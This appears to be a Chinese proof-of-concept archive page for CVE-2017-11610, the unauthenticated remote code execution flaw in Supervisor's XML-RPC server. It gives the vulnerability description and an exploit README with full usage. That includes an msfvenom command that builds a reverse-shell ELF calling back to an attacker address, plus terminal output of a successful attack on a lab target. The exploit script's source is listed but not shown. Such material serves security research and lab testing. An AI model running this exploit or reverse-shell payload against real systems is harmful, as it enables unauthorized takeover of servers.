关联漏洞
标题:
Supervisor XML-RPC服务器安全漏洞
(CVE-2017-11610)
描述:Supervisor是一套进程控制系统,用于监视和控制类Unix系统上的进程。XML-RPC server是其中的一个XML-RPC服务器。 Supervisor中的XML-RPC服务器存在安全漏洞。远程攻击者可借助特制的XML-RPC请求利用该漏洞执行任意命令。以下版本受到影响:supervisor 3.0.1之前的版本,3.1.4之前的3.1.x版本,3.2.4之前的3.2.x版本,3.3.3之前的3.3.x版本。
描述
Standalone Python ≥3.6 RCE Unauthenticated exploit for Supervisor 3.0a1 to 3.3.2
介绍
# CVE-2017-11610 Unauthenticated Reverse Shell RCE for Supervisor 3.0a1 - 3.3.2
Standalone Python ≥3.6 Unauthenticated RCE exploit for Supervisor 3.0a1 to 3.3.2, rewritten from this [Metasploit module](https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/linux/http/supervisor_xmlrpc_exec.rb). Explanatory [post here](https://ivanitlearning.wordpress.com/2019/11/05/ruby-exploit-rewrite-supervisor-3-0a1-to-3-3-2-unauthenticated-rce/).
Tested with Python 3.7 on [this target](https://github.com/vulhub/vulhub/tree/master/supervisor/CVE-2017-11610) runing Supervisor 3.3.2
## Usage:
```
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -h
usage: exploit.py [-h] -rhost RHOST [-rport RPORT] -payload PAYLOAD
[-rpcpath RPCPATH]
Generate the payload first, eg:
msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o dir/payload.elf
Required arguments:
-rhost RHOST Target host running Supervisor eg. 192.168.92.153
-payload PAYLOAD Path to the ELF payload. eg dir/payload.elf
Optional arguments:
-rport RPORT Target port running Supervisor. Default: 9001
-rpcpath RPCPATH Path to the XML-RPC endpoint on Supervisor. Default: '/RPC2' as in http://192.168.92.153:9001/RPC2
Call the exploit like this:
./exploit.py -rhost 192.168.92.153 -rport 9001 -rpcpath /RPC2 -payload dir/payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# msfvenom -a x64 --platform Linux -p linux/x64/shell_reverse_tcp LHOST=192.168.92.134 LPORT=4445 -f elf -o payload.elf
No encoder or badchars specified, outputting raw payload
Payload size: 74 bytes
Final size of elf file: 194 bytes
Saved as: payload.elf
root@Kali:~/Infosec/RubyStuff/Supervisor-3.3.2# ./exploit.py -rhost 192.168.92.153 -payload payload.elf
Extracting version from web interface..
Vulnerable version found: 3.3.2
Sending XML-RPC payload via POST to 192.168.92.153:9001/RPC2
Successful remote code execution
```
文件快照
[4.0K] /data/pocs/bfcce2903eb258fc507744dc4414228b7d2203d5
├── [5.2K] exploit.py
└── [1.9K] README.md
0 directories, 2 files
备注
1. 建议优先通过来源进行访问。
2. 如果因为来源失效或无法访问,请发送邮箱到 f.jinxu#gmail.com 索取本地快照(把 # 换成 @)。
3. 神龙已为您对POC代码进行快照,为了长期维护,请考虑为本地POC付费,感谢您的支持。